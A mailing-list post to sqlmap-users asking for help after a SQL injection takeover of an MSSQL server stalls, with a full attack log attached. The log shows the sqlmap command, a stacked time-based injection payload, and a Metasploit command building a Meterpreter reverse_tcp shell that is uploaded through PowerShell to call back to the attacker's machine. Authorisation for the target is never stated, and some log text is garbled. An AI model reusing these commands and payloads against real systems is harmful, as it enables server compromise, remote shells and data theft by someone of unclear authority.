[sqlmap-users] Error with operating system takeover (meterpreter)

[Peter L. <myp...@gm...>]

Hi All,

In first phase of our test we discovered Target URL is vulnerable and we
managed to retrieved lots of information such as --users, --dbs, some of
--tables and lots more. All this retrieval was very slow probably due to
time-based vulnerability; however tried through all (BEUSTQ) and found same
state.

During an attempt after few days of our success we noticed some of the
parameter is not working and we are receiving errors like for instance
during requery for --users we received error "[09:39:23] [CRITICAL] unable
to retrieve the number of database users". During requery for -U sa
--passwords we received "unnable to retrieve the password hashes for the
database users (probably because the session user has no read privileges
over the relevant system database table)".

We moved to OS takeover, initially get error for xp_cmdshell however
activated and confirmed using SQLNinja and moved on to get --os-shell,
executed some of commands like "hostname", "whoami" and successfully
retrieved its output.

Now after few minutes we noted that we are not getting any output of any
command with message "No output".

We moved to --os-pwn + --msf-path, But again with no success on meterpreter
or VNC.
received error "HTTP error codes detected during run:
404 (Not Found) - 1 times"

I'm attaching screen log, please help me with this if thr is any scope
available.
Thanks in Advance.



-------screen logs start-------

root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
--dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
test_msf7 -v 2
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 10:03:33

mytarget_login
[10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
[10:03:33] [DEBUG] not a valid WebScarab log data
[10:03:33] [DEBUG] cleaning up configuration parameters
test_msf7
mytarget_login
/opt/metasploit/apps/pro/msf3
[10:03:33] [INFO] setting file for logging HTTP traffic
[10:03:33] [DEBUG] setting the HTTP timeout
[10:03:33] [DEBUG] creating HTTP requests opener object
[10:03:33] [DEBUG] forcing back-end DBMS to user defined value
[10:03:33] [DEBUG] setting the takeover out-of-band functionality
[10:03:33] [DEBUG] provided Metasploit Framework path
'/opt/metasploit/apps/pro/msf3' is valid
[10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
[10:03:33] [DEBUG] resolving hostname 'mytarget.com'
[10:03:33] [INFO] testing connection to the target URL
[10:03:48] [DEBUG] declared web page charset 'utf-8'
sqlmap got a 302 redirect to '
https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow?
[Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST
data to a new location? [Y/n] Y
[10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
reset by peer')
[10:03:56] [DEBUG] heuristically checking if the target is protected by
some kind of WAF/IPS/IDS
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Parameter: testNumber (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload:
example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
WAITFOR DELAY '0:0:5'--&testPassword=3243
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[10:03:56] [INFO] testing Microsoft SQL Server
[10:03:56] [INFO] confirming Microsoft SQL Server
[10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
Server/MSSQ^10.MSSQLSERVER/MSSQLaLo
Ā as temporary files directory
[10:04:00] [INFO] testing if current user is DBA
[10:04:00] [DEBUG] creating a support table to write commands standard
output to
[10:04:00] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[10:04:04] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
[10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
[10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:04] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[10:04:05] [ERROR] unable to retrieve xp_cmdshell output
[10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Reverse TCP: Try to connect back from the database host to this
machine, on all ports example3ween the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [192.168.1.8]
which local port number do you want to use? [61371]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[10:04:17] [DEBUG] executing local command:
/opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
/opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
"/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
[10:04:17] [INFO] creation in progress .................. done
[10:04:35] [DEBUG] the shellcode size is 308 bytes
[10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo
Ā/tmpsebykt.exe'
[10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
injection technique
[10:04:35] [INFO] using PowerShell to write the binary file content to file
'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe'
[10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpfidjf.txt,
please wait..
[10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmppsbcbi.ps1
[10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write
the D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe file, please wait..
[10:04:37] [WARNING] if you experience problems with non-ASCII identifier
names you are advised to rerun with '--tamper=charunicodeencode'
[10:04:37] [DEBUG] checking the length of the remote file D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe
[10:04:37] [INFO] retrieved:
[10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:37] [WARNING] it looks like the file has not been written (usually
occurs if the DBMS process' user has no write privileges in the destination
path)
do you want to try to upload the file with the custom Visual Basic script
technique? [Y/n] Y
[10:04:41] [INFO] using a custom visual basic script to write the binary
file content to file 'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe', please wait..
[10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpfegab.txt,
please wait..
[10:04:41] [CRITICAL] page not found (404)
[10:04:41] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[*] shutting down at 10:04:41

root@kali:~#


-------screen logs end-------


Please help!!